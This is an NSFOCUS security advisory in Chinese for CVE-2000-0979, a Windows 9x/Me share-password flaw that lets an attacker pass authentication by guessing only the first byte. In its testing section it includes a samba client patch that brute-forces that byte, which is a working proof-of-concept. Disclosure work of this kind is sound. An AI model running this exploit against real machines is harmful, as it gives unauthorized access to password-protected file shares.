首頁 -> 安全研究

安全研究

安全公告
綠盟科技安全公告(SA2000-05)

NSFOCUS安全小組([email protected])
http://www.nsfocus.com

Microsoft Windows 9x共享密碼校驗漏洞

發布日期:2000-10-11

CVE ID:CVE-2000-0979

受影響的軟件及系統:
====================
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows 98 Second Edition
- Microsoft Windows Me

綜述:
======
NSFOCUS 安全小組發現了微軟Windows 9x NETBIOS協議口令校驗部分存在一個安全漏洞。這個漏洞允許任意用戶訪問Windows 9x文件共享服務,即使此共享目錄已經受到口令保護。攻擊者并不需要知道真實口令。

分析:
======
Windows 9x系統提供的文件和打印共享服務可以設置口令保護,以避免非法用戶的訪問。然而微軟NETBIOS協議的口令校驗機制存在一個嚴重漏洞,使得這種保護形同虛設。

服務端在對客戶端的口令進行校驗時是以客戶端發送的長度數據為依據的。因此,客戶端在發送口令認證數據包時可以設置長度域為1, 同時發送一個字節的明文口令給服務端。服務端就會將客戶端發來口令與服務端保存的共享口令的第一個字節進行明文比較,如果匹配就認為通過了驗證。因此,攻擊者僅僅需要猜測共享口令的第一個字節即可。

Microsoft Windows 9x 的遠程管理也是采用的共享密碼認證方式,所以也受此漏洞影響。

測試方法:
==========
下面提供一個簡單的測試程序。

您需要下載并修改Linux下的samba client(source/client/client.c)的源碼:

--- samba-2.0.6.orig/source/client/client.c     Thu Nov 11 10:35:59 1999
+++ samba-2.0.6/source/client/client.c  Mon Sep 18 21:20:29 2000
@@ -1961,12 +1961,22 @@ struct cli_state *do_connect(char *serve

        DEBUG(4,(" session setup ok\n"));

+/*
        if (!cli_send_tconX(c, share, "?????",
                            password, strlen(password)+1)) {
                DEBUG(0,("tree connect failed: %s\n", cli_errstr(c)));
                cli_shutdown(c);
                return NULL;
        }
+*/
+
+        password[0] = 0;
+        c->sec_mode = 0;
+        do{
+
+          password[0]+=1;
+
+        }while(!cli_send_tconX(c, share, "?????", password, 1));

        DEBUG(4,(" tconx ok\n"));

解決方法:
==========
NSFOCUS建議您在沒有獲得并安裝補丁程序之前,暫時關閉文件共享服務。

廠商狀態:
==========
我們已經將這個問題通報給了微軟公司,微軟已就此發布了一個安全公告(MS00-072)
以及相應補丁。

您可以在下列地址看到微軟安全公告的詳細內容:

http://www.microsoft.com/technet/security/bulletin/ms00-072.asp

英文版的補丁程序可以在下列地址下載:

. Microsoft Windows 95
  微軟將會盡快提供補丁

. Microsoft Windows 98 and 98 Second Edition

  http://download.microsoft.com/download/win98SE/Update/11958/W98/EN-US/273991USA8.EXE

. Microsoft Windows Me

  http://download.microsoft.com/download/winme/Update/11958/WinMe/EN-US/273991USAM.EXE

聲 明
==========

本安全公告僅用來描述可能存在的安全問題,綠盟科技不為此安全公告提供任何保證或承諾。由于傳播、利用此安全公告所提供的信息而造成的任何直接或者間接的后果及損失,均由使用者本人負責,綠盟科技以及安全公告作者不為此承擔任何責任。綠盟科技擁有對此安全公告的修改和解釋權。如欲轉載或傳播此安全公告,必須保證此安全公告的完整性,包括版權聲明等全部內容。未經綠盟科技允許,不得任意修改或者增減此安全公告內容,不得以任何方式將其用于商業目的。

關于綠盟科技
============

綠盟科技(NSFOCUS Co., Ltd.)是中國網絡安全領域的領導企業,致力于網絡和系統安全問題的研究、高端網絡安全產品的研發、銷售與網絡安全服務,在入侵檢測/保護、遠程評估、 DDoS攻擊防護等方面提供具有國際競爭能力的先進產品,是國內最具安全服務經驗的專業公司。有關綠盟科技的詳情請參見: http://www.nsfocus.com

© 2020 綠盟科技
浙江快乐彩网上投注